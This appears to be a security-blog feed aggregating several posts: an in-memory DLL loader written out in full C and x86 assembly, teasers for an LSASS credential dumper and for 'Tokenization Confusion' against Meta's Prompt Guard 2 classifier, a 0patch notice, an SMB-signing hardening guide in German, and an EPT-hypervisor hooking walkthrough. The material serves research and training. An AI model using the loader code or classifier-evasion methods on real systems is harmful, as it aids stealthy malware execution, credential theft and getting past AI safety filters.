  • Should work on Magisk, KernelSU, KernelSU Next, APatch
  • Copies all certificates from the user store to the /system store
  • Supports multiple users (e.g. work profiles)
  • Mounts the updated /system store to /apex, if it’s available
  • Injects the updated mount into zygote and all children
  • When zygote crashes, it reinjects all mounts
  • Disabling root CAs is supported

Enjoy, and open a PR if there are any issues! https://github.com/NVISOsecurity/AlwaysTrustUserCerts

Jeroen Beckers

Jeroen Beckers is a mobile security expert working in the NVISO Software Security Assessment team. He travels around the world teaching SANS SEC575: iOS and Android Application Security Analysis and Penetration Testing and is a co-author of OWASP Mobile Application Security (MAS) project, which includes:

  • OWASP Mobile Application Security Testing Guide (MASTG)
  • OWASP Mobile Application Security Verification Standard (MASVS)
  • OWASP Mobile Application Security Weakness Enumeration (MASWE)

Tokenization Confusion

4 June 2025 at 23:01
In this post we look at the new Prompt Guard 2 model from Meta, and introduce a concept I've been calling "Tokenization Confusion" which aims to confuse Unigram tokenization into generating tokens which will result in the misclassification of malicious prompts. We'll also look at why building up our ML knowledge will lead to better findings when assessing LLM API’s, as I discovered during a flight across the Atlantic.

Shellcode: In-Memory Execution of DLL

24 June 2019 at 01:30

Introduction

In March 2002, the infamous group 29A published their sixth e-zine. One of the articles titled In-Memory PE EXE Execution by Z0MBiE demonstrated how to manually load and run a Portable Executable entirely from memory. The InMem client provided as a PoC downloads a PE from a remote TFTP server into memory and after some basic preparation executes the entrypoint. Of course, running console and GUI applications from memory isn’t that straightforward because Microsoft Windows consists of subsystems. Try manually executing a console application from inside a GUI subsystem without using NtCreateProcess and it will probably cause an unhandled exception crashing the host process. Unless designed for a specific subsystem, running a DLL from memory is relatively error-free and simple to implement, so this post illustrates just that with C and x86 assembly.

Proof of Concept

Z0MBiE didn’t seem to perform any other research beyond a PoC, however, Y0da did write a tool called InConEx that was published in 29A#7 ca. 2004. Since then, various other implementations have been published, but they all seem to be derived in one form or another from the original PoC and use the following steps.

  1. Allocate RWX memory for size of image. (VirtualAlloc)
  2. Copy each section to RWX memory.
  3. Initialize the import table. (LoadLibrary/GetProcAddress)
  4. Apply relocations.
  5. Execute entry point.

Today, some basic loaders will also handle resources and TLS callbacks. The following is example in C based on Z0MBiE’s article.

typedef struct _IMAGE_RELOC {
    WORD offset :12;
    WORD type   :4;
} IMAGE_RELOC, *PIMAGE_RELOC;

typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
typedef VOID (WINAPI *entry_exe)(VOID);

VOID load_dllx(LPVOID base);

VOID load_dll(LPVOID base) {
    PIMAGE_DOS_HEADER        dos;
    PIMAGE_NT_HEADERS        nt;
    PIMAGE_SECTION_HEADER    sh;
    PIMAGE_THUNK_DATA        oft, ft;
    PIMAGE_IMPORT_BY_NAME    ibn;
    PIMAGE_IMPORT_DESCRIPTOR imp;
    PIMAGE_RELOC             list;
    PIMAGE_BASE_RELOCATION   ibr;
    DWORD                    rva;
    PBYTE                    ofs;
    PCHAR                    name;
    HMODULE                  dll;
    ULONG_PTR                ptr;
    DllMain_t                DllMain;
    LPVOID                   cs;
    DWORD                    i, cnt;
    
    dos = (PIMAGE_DOS_HEADER)base;
    nt  = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    
    // 1. Allocate RWX memory for file
    cs  = VirtualAlloc(
      NULL, nt->OptionalHeader.SizeOfImage, 
      MEM_COMMIT | MEM_RESERVE, 
      PAGE_EXECUTE_READWRITE);
      
    // 2. Copy each section to RWX memory
    sh = IMAGE_FIRST_SECTION(nt);
      
    for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
      memcpy((PBYTE)cs + sh[i].VirtualAddress,
          (PBYTE)base + sh[i].PointerToRawData,
          sh[i].SizeOfRawData);
    }
    
    // 3. Process the Import Table
    rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
    imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);
      
    // For each DLL
    for (;imp->Name!=0; imp++) {
      name = RVA2VA(PCHAR, cs, imp->Name);
      
      // Load it
      dll = LoadLibrary(name);
      
      // Resolve the API for this library
      oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
      ft  = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
        
      // For each API
      for (;; oft++, ft++) {
        // No API left?
        if (oft->u1.AddressOfData == 0) break;
        
        PULONG_PTR func = (PULONG_PTR)&ft->u1.Function;
        
        // Resolve by ordinal?
        if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
          *func = (ULONG_PTR)GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
        } else {
          // Resolve by name
          ibn   = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
          *func = (ULONG_PTR)GetProcAddress(dll, ibn->Name);
        }
      }
    }
    
    // 4. Apply Relocations
    rva  = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
    ibr  = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);
    ofs  = (PBYTE)cs - nt->OptionalHeader.ImageBase;
    
    while(ibr->VirtualAddress != 0) {
      list = (PIMAGE_RELOC)(ibr + 1);

      while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
        if(list->type == IMAGE_REL_TYPE) {
          *(ULONG_PTR*)((PBYTE)cs + ibr->VirtualAddress + list->offset) += (ULONG_PTR)ofs;
        }
        list++;
      }
      ibr = (PIMAGE_BASE_RELOCATION)list;
    }

    // 5. Execute entrypoint
    DllMain = RVA2VA(DllMain_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
    DllMain(cs, DLL_PROCESS_ATTACH, NULL);
}

x86 assembly

Using the exact same logic except implemented in hand-written assembly … for illustration of course!.

; DLL loader in 306 bytes of x86 assembly (written for fun)
; odzhan

      %include "ds.inc"

      bits   32

      struc _ds
          .VirtualAlloc        resd 1 ; edi
          .LoadLibraryA        resd 1 ; esi
          .GetProcAddress      resd 1 ; ebp
          .AddressOfEntryPoint resd 1 ; esp
          .ImportTable         resd 1 ; ebx
          .BaseRelocationTable resd 1 ; edx
          .ImageBase           resd 1 ; ecx
      endstruc

      %ifndef BIN
        global load_dllx
        global _load_dllx
      %endif
      
load_dllx:
_load_dllx: 
      pop    eax            ; eax = return address
      pop    ebx            ; ebx = base of PE file
      push   eax            ; save return address on stack
      pushad                ; save all registers
      call   init_api       ; load address of api hash onto stack
      dd     0x38194E37     ; VirtualAlloc
      dd     0xFA183D4A     ; LoadLibraryA
      dd     0x4AAC90F7     ; GetProcAddress
init_api:
      pop    esi            ; esi = api hashes
      pushad                ; allocate 32 bytes of memory for _ds
      mov    edi, esp       ; edi = _ds
      push   TEB.ProcessEnvironmentBlock
      pop    ecx
      cdq                   ; eax should be < 0x80000000
get_apis:
      lodsd                 ; eax = hash
      pushad
      mov    eax, [fs:ecx]
      mov    eax, [eax+PEB.Ldr]
      mov    edi, [eax+PEB_LDR_DATA.InLoadOrderModuleList + LIST_ENTRY.Flink]
      jmp    get_dll
next_dll:    
      mov    edi, [edi+LDR_DATA_TABLE_ENTRY.InLoadOrderLinks + LIST_ENTRY.Flink]
get_dll:
      mov    ebx, [edi+LDR_DATA_TABLE_ENTRY.DllBase]
      mov    eax, [ebx+IMAGE_DOS_HEADER.e_lfanew]
      ; ecx = IMAGE_DATA_DIRECTORY.VirtualAddress
      mov    ecx, [ebx+eax+IMAGE_NT_HEADERS.OptionalHeader + \
                           IMAGE_OPTIONAL_HEADER32.DataDirectory + \
                           IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
                           IMAGE_DATA_DIRECTORY.VirtualAddress]
      jecxz  next_dll
      ; esi = offset IMAGE_EXPORT_DIRECTORY.NumberOfNames 
      lea    esi, [ebx+ecx+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
      lodsd
      xchg   eax, ecx
      jecxz  next_dll        ; skip if no names
      ; ebp = IMAGE_EXPORT_DIRECTORY.AddressOfFunctions     
      lodsd
      add    eax, ebx        ; ebp = RVA2VA(eax, ebx)
      xchg   eax, ebp        ;
      ; edx = IMAGE_EXPORT_DIRECTORY.AddressOfNames
      lodsd
      add    eax, ebx        ; edx = RVA2VA(eax, ebx)
      xchg   eax, edx        ;
      ; esi = IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals      
      lodsd
      add    eax, ebx        ; esi = RVA(eax, ebx)
      xchg   eax, esi
get_name:
      pushad
      mov    esi, [edx+ecx*4-4] ; esi = AddressOfNames[ecx-1]
      add    esi, ebx           ; esi = RVA2VA(esi, ebx)
      xor    eax, eax           ; eax = 0
      cdq                       ; h = 0
hash_name:    
      lodsb
      add    edx, eax
      ror    edx, 8
      dec    eax
      jns    hash_name
      cmp    edx, [esp + _eax + pushad_t_size]   ; hashes match?
      popad
      loopne get_name              ; --ecx && edx != hash
      jne    next_dll              ; get next DLL        
      movzx  eax, word [esi+ecx*2] ; eax = AddressOfNameOrdinals[eax]
      add    ebx, [ebp+eax*4]      ; ecx = base + AddressOfFunctions[eax]
      mov    [esp+_eax], ebx
      popad                        ; restore all
      stosd
      inc    edx
      jnp    get_apis              ; until PF = 1
      
      ; dos = (PIMAGE_DOS_HEADER)ebx
      push   ebx
      add    ebx, [ebx+IMAGE_DOS_HEADER.e_lfanew]
      add    ebx, ecx
      ; esi = &nt->OptionalHeader.AddressOfEntryPoint
      lea    esi, [ebx+IMAGE_NT_HEADERS.OptionalHeader + \
                       IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint - 30h]
      movsd          ; [edi+ 0] = AddressOfEntryPoint
      mov    eax, [ebx+IMAGE_NT_HEADERS.OptionalHeader + \
                       IMAGE_OPTIONAL_HEADER32.DataDirectory + \
                       IMAGE_DIRECTORY_ENTRY_IMPORT * IMAGE_DATA_DIRECTORY_size + \
                       IMAGE_DATA_DIRECTORY.VirtualAddress - 30h]
      stosd          ; [edi+ 4] = Import Directory Table RVA
      mov    eax, [ebx+IMAGE_NT_HEADERS.OptionalHeader + \
                       IMAGE_OPTIONAL_HEADER32.DataDirectory + \
                       IMAGE_DIRECTORY_ENTRY_BASERELOC * IMAGE_DATA_DIRECTORY_size + \
                       IMAGE_DATA_DIRECTORY.VirtualAddress - 30h]
      stosd          ; [edi+ 8] = Base Relocation Table RVA
      lodsd          ; skip BaseOfCode
      lodsd          ; skip BaseOfData
      movsd          ; [edi+12] = ImageBase
      ; cs  = VirtualAlloc(NULL, nt->OptionalHeader.SizeOfImage, 
      ;          MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      push   PAGE_EXECUTE_READWRITE
      xchg   cl, ch
      push   ecx
      push   dword[esi + IMAGE_OPTIONAL_HEADER32.SizeOfImage - \
                         IMAGE_OPTIONAL_HEADER32.SectionAlignment]
      push   0                           ; NULL
      call   dword[esp + _ds.VirtualAlloc + 5*4]
      xchg   eax, edi                    ; edi = cs
      pop    esi                         ; esi = base
      
      ; load number of sections
      movzx  ecx, word[ebx + IMAGE_NT_HEADERS.FileHeader + \
                             IMAGE_FILE_HEADER.NumberOfSections - 30h]
      ; edx = IMAGE_FIRST_SECTION()
      movzx  edx, word[ebx + IMAGE_NT_HEADERS.FileHeader + \
                             IMAGE_FILE_HEADER.SizeOfOptionalHeader - 30h]
      lea    edx, [ebx + edx + IMAGE_NT_HEADERS.OptionalHeader - 30h]
map_section:
      pushad
      add    edi, [edx + IMAGE_SECTION_HEADER.VirtualAddress]
      add    esi, [edx + IMAGE_SECTION_HEADER.PointerToRawData]
      mov    ecx, [edx + IMAGE_SECTION_HEADER.SizeOfRawData]
      rep    movsb
      popad
      add    edx, IMAGE_SECTION_HEADER_size
      loop   map_section
      mov    ebp, edi
      ; process the import table
      pushad
      mov    ecx, [esp + _ds.ImportTable + pushad_t_size]
      jecxz  imp_l2
      lea    ebx, [ecx + ebp]
imp_l0:
      ; esi / oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
      mov    esi, [ebx+IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk]
      add    esi, ebp
      ; edi / ft  = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
      mov    edi, [ebx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk]
      add    edi, ebp
      mov    ecx, [ebx+IMAGE_IMPORT_DESCRIPTOR.Name]
      add    ebx, IMAGE_IMPORT_DESCRIPTOR_size
      jecxz  imp_l2
      add    ecx, ebp         ; name = RVA2VA(PCHAR, cs, imp->Name);
      ; dll = LoadLibrary(name);
      push   ecx
      call   dword[esp + _ds.LoadLibraryA + 4 + pushad_t_size]  
      xchg   edx, eax         ; edx = dll
imp_l1:
      lodsd                   ; eax = oft->u1.AddressOfData, oft++;
      xchg   eax, ecx
      jecxz  imp_l0           ; if (oft->u1.AddressOfData == 0) break; 
      btr    ecx, 31
      jc     imp_Lx           ; IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)
      ; RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData)
      lea    ecx, [ebp + ecx + IMAGE_IMPORT_BY_NAME.Name]
imp_Lx:
      ; eax = GetProcAddress(dll, ecx);
      push   edx
      push   ecx
      push   edx
      call   dword[esp + _ds.GetProcAddress + 3*4 + pushad_t_size]  
      pop    edx
      stosd                   ; ft->u1.Function = eax
      jmp    imp_l1
imp_l2:
      popad
      ; ibr  = RVA2VA(PIMAGE_BASE_RELOCATION, cs, dir[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
      mov    esi, [esp + _ds.BaseRelocationTable]
      add    esi, ebp
      ; ofs  = (PBYTE)cs - opt->ImageBase;
      mov    ebx, ebp
      sub    ebp, [esp + _ds.ImageBase]
reloc_L0:
      ; while (ibr->VirtualAddress != 0) {
      lodsd                  ; eax = ibr->VirtualAddress
      xchg   eax, ecx
      jecxz  call_entrypoint
      lodsd                  ; skip ibr->SizeOfBlock
      lea    edi, [esi + eax - 8]
reloc_L1:
      lodsw                  ; ax = *(WORD*)list;
      and    eax, 0xFFF      ; eax = list->offset
      jz     reloc_L2        ; IMAGE_REL_BASED_ABSOLUTE is used for padding
      add    eax, ecx        ; eax += ibr->VirtualAddress
      add    eax, ebx        ; eax += cs
      add    [eax], ebp      ; *(DWORD*)eax += ofs
      ; ibr = (PIMAGE_BASE_RELOCATION)list;
reloc_L2:
      ; (PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock
      cmp    esi, edi
      jne    reloc_L1
      jmp    reloc_L0
call_entrypoint:
  %ifndef EXE
      push   ecx                 ; lpvReserved
      push   DLL_PROCESS_ATTACH  ; fdwReason    
      push   ebx                 ; HINSTANCE   
      ; DllMain = RVA2VA(entry_exe, cs, opt->AddressOfEntryPoint);
      add    ebx, [esp + _ds.AddressOfEntryPoint + 3*4]
  %else
      add    ebx, [esp + _ds.AddressOfEntryPoint]
  %endif
      call   ebx
      popad                  ; release _ds
      popad                  ; restore registers
      ret

Running a DLL from memory isn’t difficult if we ignore the export table, resources, TLS and subsystem. The only requirement is that the DLL has a relocation section. The C generated assembly will be used in a new version of Donut while sources in this post can be found here.

Doppelganger: An Advanced LSASS Dumper with Process Cloning

3 June 2025 at 12:52
Reading Time: 18 minutesGithub Repo: https://github.com/vari-sh/RedTeamGrimoire/tree/main/Doppelganger What is LSASS? The Local Security Authority Subsystem Service (LSASS) is a core component of the Windows operating system, responsible for enforcing the security policy on the system. LSASS is a process that runs as lsass.exe and plays a fundamental role in: User authentication: It verifies users logging into the system, interacting with authentication protocols such as […]

Build your own pen testing tools and master red teaming tactics | Ed Williams

2 June 2025 at 18:00

Get your FREE Cybersecurity Salary Guide: https://www.infosecinstitute.com/form/cybersecurity-salary-guide-podcast/?utm_source=youtube&utm_medium=podcast&utm_campaign=podcast

Ed Williams, Vice President of EMEA Consulting and Professional Services (CPS) at TrustWave, shares his two decades of pentesting and red teaming experience with Cyber Work listeners. 


From building his first programs on a BBC Micro (an early PC underwritten by the BBC network in England to promote computer literacy) to co-authoring award-winning red team security tools, Ed discusses his favorite red team social engineering trick (hint: it involves fire extinguishers!), and the ways that pentesting and red team methodologies have (and have not) changed in 20 years. As a bonus, Ed explains how he created a red team tool that gained accolades from the community in 2013, and how building your own tools can help you create your personal calling card in the Cybersecurity industry! 

Whether you're breaking into cybersecurity or looking to level up your pentesting skills, Ed's practical advice and red team “war stories,” as well as his philosophy of continuous learning that he calls “Stacking Days,” bring practical and powerful techniques to your study of Cybersecurity.

0:00 - Intro to today's episode
2:17 - Meet Ed Williams and his BBC Micro origins
5:16 - Evolution of pentesting since 2008
12:50 - Creating the RedSnarf tool in 2013
17:18 - Advice for aspiring pentesters in 2025
19:59 - Building community and finding collaborators
22:28 - Red teaming vs pentesting strategies
24:19 - Red teaming, social engineering, and fire extinguishers
27:07 - Early career obsession and focus
29:41 - Essential skills: Python and command-line mastery
31:30 - Best career advice: "Stacking Days"
32:12 - About TrustWave and connecting with Ed

About Infosec
Infosec's mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ's security awareness training. Learn more at infosecinstitute.com.

💾

Micropatches Released for Preauth DoS on Windows Deployment Service (CVE-2025-29957)

29 May 2025 at 13:17

 


May 2025 Windows updates brought a fix for CVE-2025-29957, a denial of service vulnerability allowing an attacker in the network to easily consume all available memory on a Windows Server with Windows Deployment Service installed. This could lead to said server being unable to provide both Windows deployment services and other services such as network file sharing, printing, or provide other server functionalities based on its configured server roles.

The vulnerability was reported to Microsoft by security researchers R4nger & Zhiniang Peng.

 

Microsoft's Patch

Microsoft patched this issue by properly freeing allocated memory on each remote session initiation.

 

Our Micropatch

Our patch does the exact same thing as Microsoft's.


Micropatch Availability

Micropatches were written for the following security-adopted versions of Windows with all available Windows Updates installed:

  1. Windows Server 2012 - fully updated without ESU, with ESU 1
  2. Windows Server 2012 R2 - fully updated without ESU, with ESU 1

 

Micropatches have already been distributed to, and applied on, all affected online computers with 0patch Agent in PRO or Enterprise accounts (unless Enterprise group settings prevented that). 

Vulnerabilities like these get discovered on a regular basis, and attackers know about them all. If you're using Windows that aren't receiving official security updates anymore, 0patch will make sure these vulnerabilities won't be exploited on your computers - and you won't even have to know or care about these things.

If you're new to 0patch, create a free account in 0patch Central, start a free trial, then install and register 0patch Agent. Everything else will happen automatically. No computer reboot will be needed.

We would like to thank security researcher Zhiniang Peng for publishing their analysis, which made it possible for us to create a micropatch for this issue.

Did you know 0patch will security-adopt Windows 10 and Office 2016/2016 when trey go out of support in October 2025, allowing you to keep using them for at least 5 more years? Read more about it here.

To learn more about 0patch, please visit our Help Center.

shell32.dll, #61

By:adam
30 May 2025 at 22:29
The function #61 exported by the shell32.dll uses an internal name RunFileDlg. So, there is no surprise that running: rundll32.exe shell32.dll, #61 presents us the familiar Run Dialog Box:

SMB Signing: Richtlinien und empfohlene Einstellung

1 June 2025 at 10:00

SMB Signing über Gruppenrichtlinie aktivieren (für Windows Pro oder höher)

Im vorhergehendem Beitrag wurde SMB Signing und seine wichtigen Funktionen vorgestellt. Dabei blieb die Frage offen: Wie aktiviere ich das denn jetzt? Wie SMB Signing aktiviert wird und was die empfohlenen Einstellungen sind, ist Thema in diesem Post.

Wo sind sie zu finden

  • Gruppenrichtlinien-Editor öffnen:
    • Drücke Windows-Taste + R um das Ausführen-Fenster aufzurufen.
    • gpedit.msc eingeben.
    • Mit Enter bestätigen.
  • Zur passenden Richtlinie navigieren:
    Klicke dich durch folgende Struktur:
    • Computerkonfiguration
    • Windows-Einstellungen
    • Sicherheitseinstellungen
    • Lokale Richtlinien
    • Sicherheitsoptionen
  • SMB-Signierungsrichtlinien auswählen:
    In den Sicherheitsoptionen findest du die relevanten Richtlinien:
    • Microsoft-Netzwerk (Client): Kommunikation digital signieren (immer)
    • Microsoft-Netzwerkclient: Kommunikation digital signieren (wenn der Server zustimmt)
    • Microsoft-Netzwerk (Server): Kommunikation digital signieren (immer)
    • Microsoft-Netzwerkserver: Kommunikation digital signieren (wenn der Client zustimmt)

Hinweis:

  • Immer = verlangt zwingend Signierung. Keine Verbindung ohne gültige Signatur.
  • Wenn der Server zustimmt = Signierung wird angeboten, aber nicht erzwungen. Kommunikation wird signiert, wenn Client ebenfalls SMB zustimmt.
  • Wenn der Client zustimmt = Signierung wird angeboten, aber nicht erzwungen. Kommunikation wird signiert, wenn Server ebenfalls SMB zustimmt.

Erlaubt man eine Signatur, ohne sie zu verlangen, bleibt man ungeschützt gegenüber ungesicherter Kommunikation und den damit übertragenen Daten.
Bei dem neuen SMB 3 ist diese Einstellung etwas vereinfacht, da automatisch einer Signatur zugestimmt wird. Da es nur von Vorteil ist einer Signatur zuzustimmen, wenn eine angeboten wird, ist diese Einstellung nun standardisiert.

Darstellung der Richtlinien

  • Microsoft-Netzwerk (Client): Kommunikation digital signieren (immer):
    • Registrierungsschlüssel: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManWorkstation\Parameters
    • Registry-Wert: RequireSecuritySignature
    • Datentyp: REG_DWORD
    • Daten: 0 (deaktivieren), 1 (aktivieren)
  • Microsoft-Netzwerkclient: Kommunikation digital signieren (wenn der Server zustimmt):
    • Registrierungsschlüssel: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManWorkstation\Parameters 
    • Registrierungswert: EnableSecuritySignature
    • Datentyp: REG_DWORD
    • Daten: 0 (deaktivieren), 1 (aktivieren)
  • Microsoft-Netzwerk (Server): Kommunikation digital signieren (immer):
    • Registrierungsschlüssel: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters 
    • Registry-Wert: RequireSecuritySignature
    • Datentyp: REG_DWORD
    • Daten: 0 (deaktivieren), 1 (aktivieren)
  • Microsoft-Netzwerkserver: Kommunikation digital signieren (wenn der Client zustimmt):
    • Registrierungsschlüssel: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters 
    • Registrierungswert: EnableSecuritySignature
    • Datentyp: REG_DWORD
    • Daten: 0 (deaktivieren), 1 (aktivieren)

SMB Signging aktivieren über die Powershell

Da Windows Home keine Gruppenrichtlinie besitzt, kann die Einstellung nur über die Powershell vorgenommen werden. Diese Variante kann auch auf allen anderen Betriebssystemen genutzt werden.

  • Powershell als Administrator ausführen
  • Befehl um SMB Signing für ausgehende Verbindungen zu aktivieren:
    Set-SmbClientConfiguration -RequireSecuritySignature $true
  • Befehl um SMB Signing für eingehende Verbindungen zu aktivieren:
    Set-SmbServerConfiguration -RequireSecuritySignature $true
  • Überprüfung der Einstellungen:
    Get-SmbClientConfiguration | FL RequireSecuritySignature
    Get-SmbServerConfiguration | FL RequireSecuritySignature

Wenn bei beiden Einstellungen True zurück gegeben wird, wurde die Einstellung korrekt übernommen und die SMB Signierung ist aktiviert.

Empfohlene Einstellungen

Um den besten Schutz zu gewährleisten, empfehlen wir folgende Einstellungen:

  • Microsoft-Netzwerk (Client): Kommunikation digital signieren (immer):
     ✅ Aktivieren
  • Microsoft-Netzwerkclient: Kommunikation digital signieren (wenn der Server zustimmt):
    ✅ Aktivieren
  • Microsoft-Netzwerk (Server): Kommunikation digital signieren (immer):
    ✅ Aktivieren
  • Microsoft-Netzwerkserver: Kommunikation digital signieren (wenn der Client zustimmt):
    ✅ Aktivieren

Geschafft

Mit diesen Einstellungen ist die Übertragung über SMB gesichert. Mit wenig Aufwand sind deine Übertragungen gesichert. Im nächsten Beitrag erfährst du noch bekannte Probleme und nochmal mehr Informationen dazu, wann diese Signatur zum Greifen kommt.

Der Beitrag SMB Signing: Richtlinien und empfohlene Einstellung erschien zuerst auf HanseSecure GmbH.

Hypervisors for Memory Introspection and Reverse Engineering

2 June 2025 at 00:00

Introduction

In this article, we explore the design and implementation of Rust-based hypervisors for memory introspection and reverse engineering on Windows. We cover two projects - illusion-rs, a UEFI-based hypervisor, and matrix-rs, a Windows kernel driver-based hypervisor. Both leverage Extended Page Tables (EPT) to implement stealthy control flow redirection without modifying guest memory.

We begin by identifying how to reliably detect when the System Service Descriptor Table (SSDT) is fully initialized within ntoskrnl.exe, allowing hooks to be safely installed without risking a system crash. Illusion and Matrix differ in how they trigger and redirect execution. Illusion uses a single EPT and in-place patching with VM-exit instructions like VMCALL, combined with Monitor Trap Flag (MTF) stepping to replay original bytes safely. In contrast, Matrix uses a dual-EPT model where the primary EPT maps read/write memory and the secondary EPT remaps execute-only shadow pages containing trampoline hooks. Execution is redirected using INT3 breakpoints and dynamic EPTP switching during EPT violations. Both approaches hide inline hooks from guest virtual memory and redirect execution flow to attacker-controlled code - such as shellcode or handler functions - using EPT-based remapping and VM-exits triggered by CPU instructions like INT3, VMCALL, or CPUID.

In hypervisor development, shadowing refers to creating a second, hypervisor-controlled view of guest memory. When a page is shadowed, the hypervisor creates a duplicate of the original page - typically referred to as a shadow page - and updates the EPT to redirect access to this copy. This allows the hypervisor to intercept, monitor, or redirect memory accesses without modifying the original guest memory. Shadowing is commonly used to inject hooks, conceal modifications, or control execution flow at a fine-grained level. The guest and shadow pages remain distinct: the guest believes it is accessing its own memory, while the hypervisor controls what is actually seen or executed.

We demonstrate how to use execute-only permissions to trap instruction fetches, read/write-only permissions to catch access violations, and shadow pages to inject trampoline redirections. For introspection and control transfer, we rely on instruction-level traps such as VMCALL, CPUID, and INT3, depending on the context. In Illusion, instruction replay is handled via Monitor Trap Flag (MTF) single-stepping to safely restore overwritten bytes.

While these techniques are well-known in the game hacking community, they remain underutilized in infosec. This article aims to bridge that gap by providing a practical, reproducible walkthrough of early boot-time and kernel-mode EPT hooking techniques. All techniques used are public, stable, and do not rely on undocumented internals or privileged SDKs.

The approach taken prioritizes minimalism and reproducibility. We assume readers have a working understanding of paging, virtual memory, and the basics of Intel VT-x and EPT. While some concepts may apply to AMD SVM and NPT, this article focuses exclusively on Intel platforms. Both hypervisors avoid modifying guest memory entirely, preserving system integrity and navigating around kernel protections like PatchGuard. This enables stealth monitoring of functions like NtCreateFile and MmIsAddressValid from outside the guest’s control using EPT-backed remapping.

Table of Contents

Illusion: UEFI-Based Hypervisor with EPT-Based Hooking

Illusion is a UEFI-based hypervisor designed for early boot-time memory introspection and syscall hooking. It was developed after matrix-rs, with a simpler design, better structure, and a focus on controlling execution without touching guest memory.

Unlike matrix, which operates from kernel mode with dual-EPT support shared across all logical processors, illusion runs from UEFI firmware and uses a single EPT per-logical processor to shadow and detour guest execution. Some hypervisors extend this design further by using one, two, three, or more EPTs - for example, maintaining separate EPTs for different execution stages or process contexts. Others also implement per-logical processor EPT isolation for tighter control. Hooks in illusion are applied using execute-only shadow pages combined with VMCALL and Monitor Trap Flag (MTF) single-stepping for memory introspection. While Illusion prioritizes early boot visibility and minimal guest interference, it also supports runtime control via user-mode CPUID hypercalls. As with all EPT-based hooking techniques, the architecture comes with trade-offs in design, maintainability, complexity, and detection risk - but those nuances are out of scope for this post.

The following diagram shows how this technique is implemented in the illusion-rs hypervisor, specifically how EPT is used to hook kernel memory. While in this example it’s applied early in the boot process, the same hooking logic can also be triggered later - such as from user-mode - if the hypervisor is signaled to enable or disable the hooks.

EPT Hooking Flow Diagram - Illusion Hypervisor Figure 1: Control flow of EPT-based function hooking in the Illusion UEFI hypervisor

Each step shown in the diagram is explained in detail in the sections below.

Setting up IA32_LSTAR MSR hook during Initialization (initialize_shared_hook_manager())

To resolve the physical and virtual base addresses and the size of the Windows kernel, we intercept writes to the IA32_LSTAR MSR. This register holds the address of the syscall handler, which Windows sets to its kernel-mode dispatcher, KiSystemCall64. When a WRMSR VM-exit occurs, we check if the MSR ID corresponds to IA32_LSTAR. If so, we extract the MSR value and scan memory backwards from that address to locate the MZ signature, which marks the start of the ntoskrnl.exe PE image, thereby determining its base virtual address. The purpose of intercepting IA32_LSTAR is not to modify syscall behavior, but to reliably extract the kernel’s loaded base address during early boot. It’s a reliable anchor point because Windows always writes to this MSR during early boot to set up KiSystemCall64.

It’s important to note that this is not an inline hook - rather, it’s a VM-exit-based intercept triggered by MSR writes. The following code shows how IA32_LSTAR interception is applied during hypervisor initialization:

Code Reference (hook_manager.rs)

trace!("Modifying MSR interception for LSTAR MSR write access");
hook_manager
    .msr_bitmap
    .modify_msr_interception(msr::IA32_LSTAR, MsrAccessType::Write, MsrOperation::Hook);

Handling WRMSR to IA32_LSTAR in [handle_msr_access()]: Unhook and Call [set_kernel_base_and_size()]

When a WRMSR VM-exit is triggered by the IA32_LSTAR hook during early kernel setup, the handle_msr_access() function unhooks the MSR and calls set_kernel_base_and_size() to resolve the kernel’s base addresses and size.

Code Reference (msr.rs)

if msr_id == msr::IA32_LSTAR {
    trace!("IA32_LSTAR write attempted with MSR value: {:#x}", msr_value);
    hook_manager.msr_bitmap.modify_msr_interception(
        msr::IA32_LSTAR,
        MsrAccessType::Write,
        MsrOperation::Unhook,
    );

    hook_manager.set_kernel_base_and_size(msr_value)?;
}

At this point in boot, the syscall entry point (KiSystemCall64) has been fully resolved by the kernel. We use its address as a scanning base to locate the start of the PE image and compute the physical base of ntoskrnl.exe.

Setting Kernel Image Base Address and Size (set_kernel_base_and_size())

